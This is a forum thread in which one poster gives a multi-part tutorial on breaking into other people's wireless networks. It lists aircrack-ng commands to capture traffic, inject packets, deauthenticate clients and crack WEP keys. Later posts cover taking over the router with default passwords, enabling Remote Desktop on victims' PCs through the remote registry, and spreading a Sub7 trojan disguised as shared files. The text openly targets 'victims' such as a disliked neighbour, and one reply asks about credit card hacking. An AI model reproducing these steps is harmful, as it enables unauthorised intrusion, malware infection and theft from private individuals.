Wireless H@cking -- ParT 1

Discussion in 'DELETED POSTS' started by ᶜᵃˡˡ ᵐᵉ Lord MeXz3, Aug 25, 2011.

Users Viewing Thread (Users: 0, Guests: 0)

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    Here we will know on how to crack a WEP key and get into others wireless networks.

    There are two methods of H@cking; locally, or globally. There are an infinite amount of subsets to the following ideas, but let us cover as much as we can. The following is one part of several parts of the tutorial that will later be posted. Let us start off with the first scenario.

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    Local H@cking


    This method normally consists gaining access some way or another via the intranet. Let us test the following method. (Note, everything highlighted inYELLOW is code, what you type in the terminal)

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    Wireless H@cking

    Let us set up a scenario here. You are eager to gain access to a non-specific, (or specific, if you have an apparent grudge with a mean neighbor) to a local computer. Here are the tools needed to gain access before we go on our mission.

        * Laptop with dual boot, (preferably BackTrack 2 for Linux, and the second boot being Windows XP Pro)
        * A CD
        * Deepburner, so you can burn your .ISO image to your CD.
        * Supported wireless card for injection to work properly (please see the list found here >>
    http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#which_is_the_best_card_to_buy.) * Enough battery life to serve you well
        * Kismet or netstumbler, (to each his own, preferably Kismet for Linux so you do not have to reboot back and forth so often; this comes complete in BackTrack 2)

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    Part 1

    Gathering your materials

    1. Download BackTrack 2 Final ISO image from:
    http://remote-exploit.org/backtrack_download.html
    2. Download DeepBurner and install: http://www.deepburner.com/?r=download
    3. Start up DB, and select burn ISO image file. Then, find your file, click burn.

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    Part 2

    Beginning the project at hand

    1. Start up your laptop into BackTrack 2. To do so, place the CD into the computer, turn it on, and select boot from CD, (it varies from laptop to laptop. It may have the option to hit a function key such as F10 to select boot device to boot from).

    [IMG]

    [IMG]

    2. BT2 will ask you to put in your username and password; root/toor
    3. Now, type in startx
    4. Once the OS is loaded, click on the black box on the bottom left hand side, this is your shell.

    5. Type in kismet and hit enter.

    6. Kismet will eventually load, and pull up a fairly primitive color GUI within the shell that shows all access points within your designated area, constantly being updated.

    7. After selecting your target, find out by kismet if it is WEP, WPA, etc. Preferably, WEP 64 or 128bit. It tells you in a sorted column on the right hand side.



    8. Now, the fun begins. Open up a few tabs within the shell. Now type each line in each new tab. Everything within the parenthesis entails exclamations in terms of what it means, syntax, etc).


    9. iwconfig wlan0 mode monitor (This places the wi-fi card in monitor mode; Syntax: iwconfig device_name_here mode command_monitor)

    10. airodump-ng --ivs --write file_name --channel 11 wlan0 (Starts the monitoring, collects weak IV packets. Syntax: airodump-ng –ivs_creates_extension_type –-write any_given_filename_here –channel this specifies any specific channel you wish to listen to, so you can filter out any unnecessary data).

    11. aireplay-ng -3 -b 00:16:B6:2E:C3:4E -h 00:14:A5:8A:02:CD wlan0 (Stimulates packets; injection. Syntax: aireplay-ng -3 attack level -b BSSID of router goes here, shown by kismet -h the attached computer to the bssid; the router wlan0=device that you are using, remains consistent).

    12. aireplay-ng -0 wlan0 -a 00:16:B6:2E:C3:4E wlan0 (This is the deauthentication attack. Aireplay-ng -0 attack number wlan0 device type of yours -a BSSID goes here again wlan0 repeat your device here, yet again).

    13. Now, watch the magic happen. To put it in layman's terms, MANY numbers will appear to be rapidly increasing. Within the airodump-ng tab you had opened, the SSID of the attacked victim will increase quite a bit. Look under the IVS column to view how many you have saved to the file. Let's for now on call this default victim SSID. Once the number hits 250,000 (if it is 64-bit encryption) or 1,000,000 for 128-bit, you will be able to execute your Cr@cking method on the IVS file you have been continuously writing.

    4. Cr@cking time! Cd to the directory that the file you have been saving. Then, execute the following: aircrack-ng -0 -n 128 -f 4 file_name.ivs (Syntax: aircrack-ng -0 attack type -n number of the encryption type, 64 or 128 -fudgefactor 2-18 *.cap or *.ivs depending on what file type you decided to save your file as while gathering packets).



    15. After a minute or two, (possibly less) you will have your hexadecimal password so now you can connect to your noob, erm, I mean 'victim's' router.

    16. Reboot your computer after jotting down the hex code, and log into your winbox on the same laptop.

    17. I would recommend to now setup your 'anonymous tools.' I would suggest doing the following; download a program that IronGeek and I wrote that spoofs your MAC address and your NetBIOS each time upon startup. It is entitled MadMacs, and may be found at irongeek.com. Execute it, and reboot back into Windows.

    18. Connect to SSID, and input the hex code twice WITHOUT THE COLLONS as required.





    19. Hopefully, if you did not screw up, you will be connected.

    Stay tuned.....

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    [IMG]


    Kismet is a console based 802.11 layers wireless network detector sniffer, and intrusion detection system. It identifies networks by passively sniffing and can even decloak hidden networks if they are in use. It can automatically detect network IP blocker by sniffing TCP, UDP, ARP and DHCP packets, log traffic in Wireshark/TCPDunp compatible format, and even plot detected networks and estimated ranges on downloaded maps.

    Download Here (Windows Users):


    http://www.megaupload.com/?d=2RUEPAoB

    Download Here (Linux Users):

    http://www.megaupload.com/?d=ATRPIKOJ

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    • GL Senior Member
    • GL Legend
    • Guru Member
    • Retired Moderator

    Slimderek Retired Moderator

    Member Since:
    Dec 14, 2010
    Message Count:
    11,969
    Likes Received:
    13
    Lovely.....
    As soon as  there's enuf wireless in Benin...
    I'll fall bck 2 this thread
    • GL Legend
    • Guru Member

    Chilldelta GL Legend

    Member Since:
    Oct 1, 2010
    Message Count:
    1,823
    Likes Received:
    3
    link not available for windows users
    • GL Legend
    • Guru Member

    eleniyan Eleniyan...

    Member Since:
    Oct 2, 2010
    Message Count:
    1,419
    Likes Received:
    0
    • GL Legend
    • Guru Member

    IFYEEZ GL Legend

    Member Since:
    Sep 30, 2010
    Message Count:
    2,475
    Likes Received:
    74
    HMMMMMMMMMM MAKING BRAIN BUH I CANT USE IT

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    http://www.megaupload.com/?d=2RUEPA0B

    orchmansolo Member

    Member Since:
    Oct 5, 2010
    Message Count:
    31
    Likes Received:
    3
    Pls, my pc doesn't read empty discs....don't know wot 2 do

    bobsimon Member

    Member Since:
    Aug 24, 2011
    Message Count:
    1
    Likes Received:
    0
    that 9ic buth that not what i am interested on i looking for who to hack credit card. 

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    hmmm
    • GL Senior Member
    • GL Legend
    • Guru Member

    POSSIBLE GL Senior Member

    Member Since:
    Sep 30, 2010
    Message Count:
    4,909
    Likes Received:
    3
    MEXZ3
    ... Thanks for this.
    Will get back as soon as this stuff dey GO. But it kinda long process o. 8)

    kombat Upcoming Guru

    Member Since:
    Oct 1, 2010
    Message Count:
    251
    Likes Received:
    7
    men i only saw BT5 nt BT2 and its 1.9gb hav downloaded 1.3gb where can i buy d software

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    :D stay tuned for part 2

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    [IMG]

    Aircrack is a suite of tools for 802.11a/b/g WEP and WPA Cr@cking like Airsnort, but it is more efficient as it can crack both WEP and WPA passwords. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK Cr@cking), and airdecap (decrypts WEP/WPA capture files).

    Download here (Windows Users):
    http://www.megaupload.com/?d=RFE87LXI

    Download here (Linux Users): http://www.megaupload.com/?d=1XPDKFUK
    • GL Senior Member
    • GL Legend
    • Guru Member

    POSSIBLE GL Senior Member

    Member Since:
    Sep 30, 2010
    Message Count:
    4,909
    Likes Received:
    3

    can only this pave way for secure wireless connection?

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    Part 2 – We have entered the building

    Now that we are connected, we may now try a few methods of attack. Of course there are many, but allow me to test a few, and you may choose the one that best suits your situation. (Note, everything highlighted in yellow is code, what you type in the terminal)

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    Now that you are apart of the network by accessing the router, we may go back to the lovely command prompt, but this time within the Win32 environment. Open up the command prompt and type: ipconfig, so you can gain information about what the router gateway is, and what your IP is automatically assigned as, (such as, 192.168.1.XXX, or 172.16.1.XXX. Simple rule of thumb is, if it is a 192 prefix, then the router address will most likely be 192.168.0.1, and for 172, it will be 172.16.0.1). So, write down the default gateway, and paste it into your browser with http:// http://www.phenoelit.de/dpl/dpl.html which lists all of the default Username and Passwords for each model number of a router out there that may be purchased by the public. If all works accordingly, now you will be able to poke around with all of the glorious settings, such as opening the ports, which is the MOST important thing to hold onto. We will discuss this later. Let us poke around and try this method of attack. Go back to command prompt and type: net view. This will display all computers connected on the network that you have so rudely joined. Now, we whip out our handy dandy program called Nessus, (or any OS fingerprinting tool that you may prefer such as, GDI, etc). The point of this is to find out what OS is on each local intranet IP address. Now, as we all know, Windows XP Pro is the sweet OS. Why, you may ask? By default, XP Pro comes with remote registry enabled by default. I ask myself why everyday, but why not profit from Microsofts flaws. Also, no, you are correct,

    noobs do not disable this service. This may be time for you to turn off yours by going into services.msc. So, let us proceed while ignoring that last sidenote. Open up your registry editor, regedit. Click File>Connect Network Registry. (Please note that in certain scenarios, you may not connect to the remote registry if the person has a blank password. To test this theory, I hopped on a wi-fi network that I was indeed allowed to connect to, and tried to connect to a passwordless computer. Low and behold, it worked, but not all of the registry keys showed up, but enough to get yourself into trouble.) Follow the directions, click connect, etc. Now I know that you are thinking to yourself, we are riding on a lot of

    hope/faith here that everything the victim does fit's our needs. Well, yeah, duh. :D This is why this is the 'non-preffered' method of choice. But its the snowballs chance in hell, so 'never going to happen you have to try it anyway' method. Let us proceed. Now, browse to the HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server. Under the Terminal Server key, you'll find a REG_DWORD value named fDenyTSConnection. Double-click on that value to open the Edit DWORD Value box and change the value data from 1 (Remote Desktop disabled) to 0 (Remote Desktop enabled). To reboot the machine if you are impatient, go back to the command prompt shell, and type: shutdown -m \\servername_or_ip_of_server_here -r Ah, now wait for the glorious boot up. If all goes accordingly, you will now be able to connect remotely to the noobs desktop, and do whatever the hell you want.

    More plausible method

    Let's say you are currently connected locally to the same access point, and are eager to try another form of attack. Now, since we wish to have remote access, let us apply what we call, a 'trojan.' A trojan gives you remote access from another place. So there are a couple of ways of doing this. One, you can download a program called Sub7. This is a VERY well known trojan. To get it, go to: http://www.hackpr.net/~sub7/ Follow the directions provided. Once you have created your server.exe, (tweaked it etc. and renamed it) we can proceed to our next step. Odds are, the noob has several victims on his network with open shares. Probably consists of .txt, .doc, .jpg, etc. files within its open shares. Usually, they are accessed quite often, especially if the document is currently being edited. Your job, (for once) is to google for something what we may call, a '.exe binder.' This is a beautiful tool indeed. It binds the server.exe that you have made, and enables you to spoof it as the picture file or text document that the person has in their shares. Once you spoof this, the victim will eventually execute the file, plus the hidden file that you have stealthily implemented. I would suggest to attach this on as many files as possible found on each computer. This is probably the most direct approach. Remember when you assigned a port to the Sub7 server.exe? Well, this brings us back to the default gateway IP address that we cracked, (accessed) earlier. Browse to the open port page, and add the port you had assigned to server.exe. While you're at it, you can go to a remote place such as a library and spoof send server.exe, (preferably rename it for the following instances to game.exe, or patch.exe, setup.exe. You get the picture.) Or apply it to a .jpg as a picture of something random to the e-mail address that you could have stealthfully acquired while sniffing on the network that you had connected to. Such as, getting a packet sniffer for windows and waiting for anything that is sent out with an @. This could also be very useful to get passwords, usernames, and so on. Anyway, be creative in terms of getting the server file to some computer on that network. For the time being, go back home, and leave your Sub7 client on, and it will notify you when it is executed. Thankfully, the programmers of the Sub7 are quite brilliant, and have the server.exe copied to some ambiguous directory, without self-destructing itself. Thus eliminating the idea that the file that 'does nothing' is a trojan. Eventually, the victim will connect, and you will have some fun from there.
    :D :D

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    [TUT]WEP Cr@cking IN WINDOWS [FULL GUI,WITH PICS]

    INTRODUCTION :
    Many Windows users here are struggling to hack WiFi networks because most of the tutorials are based on BackTrack and other Linux Tools .

    Im just sharing the method to Crack WiFi networks using WEP security protocol . The WEP is a very vuarable to attacks and can be cracked
    easily .
    It takes about 5-6 hours if the password is weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .
    The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it .


    You will be using two tools .

    1.Commview for WiFi :
    You will use this tool for capturing the packets sent and recieved through the Access Point you are going to hack .
    The more packets you capture the better chances of Cr@cking the password .
    You will need more than 1,00,000 minium packets to crack the password .
    The packets will be captured in the .ncp format .
    You will use this tool to convert the .ncp to .cap .

    NOTE : Some WiFi cards are supported by Commview only in Windows 7 so i suggest you install Win 7 in ur Virtual Machine if ur card isnt supported .



    2.Aircrack-Ng GUI :
    You will use this tool to crack the password of the Access Point using the .cap files you obtained from the Commview application .

    NOTE : You need to run this as administrator .

    I have provided links for both the software below .


    Download Links :

    These are the links to the official website of the tools .
    Some Anti Viruses might detect Aircrack as a virus . It is a false positive .

    1.Aircrack-NG GUI

    Get It Here : CLICK HERE

    2.Commview for Wifi

    Get It Here: CLICK HERE

    GET READY TO CRACK :

    STEP 1 :
    1.Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP .
    It automatically installs the necessary drivers . Allow it to install .

    NOTE : You will not be able to connect to any Network using WiFi when using CommView .


    STEP 2 :
    2.Click on the Attach in the Left First .
    Spoiler

    Attached Files:

    • 1.png
      1.png
      File size:
      34.4 KB
      Views:
      4

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    STEP 3 (Choosing the Network (a) ) :
    A new window should pop up now .
    Click on the START SCANNING button .

    Attached Files:

    • 2.png
      2.png
      File size:
      24.8 KB
      Views:
      4

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    STEP 4 (Choosing the Network (b) ) :
    Click on the WiFi network you want to hack in the Right Coulumn and Click on CAPTURE.
    NOTE : This tutorial is only for WEP protected networks .

    Attached Files:

    • 3.png
      3.png
      File size:
      33.9 KB
      Views:
      4

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    STEP 5 (Capturing the Packets) :
    The windows should close now and you should see that CommView has started Capturing Packets .

    Attached Files:

    • 4.png
      4.png
      File size:
      35.7 KB
      Views:
      4

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    STEP 6 (Saving the Packets ) :
    Now that the Packets are getting captured you need to Save them.
    Click on Settings->Options->Memory Usage
    Change Maximum Packets in buffer to 20000

    Attached Files:

    • 5.png
      5.png
      File size:
      63.6 KB
      Views:
      4

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    Click on the LOGGING Tab .
    Check AUTO-SAVING
    In the Maximum Directory Size : 2000
    Average Log File Size : 20

    Attached Files:

    • 6.png
      6.png
      File size:
      24.6 KB
      Views:
      2

    ᶜᵃˡˡ ᵐᵉ Lord MeXz3 Member

    Member Since:
    Sep 30, 2010
    Message Count:
    1,180
    Likes Received:
    0
    Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory


Share This Page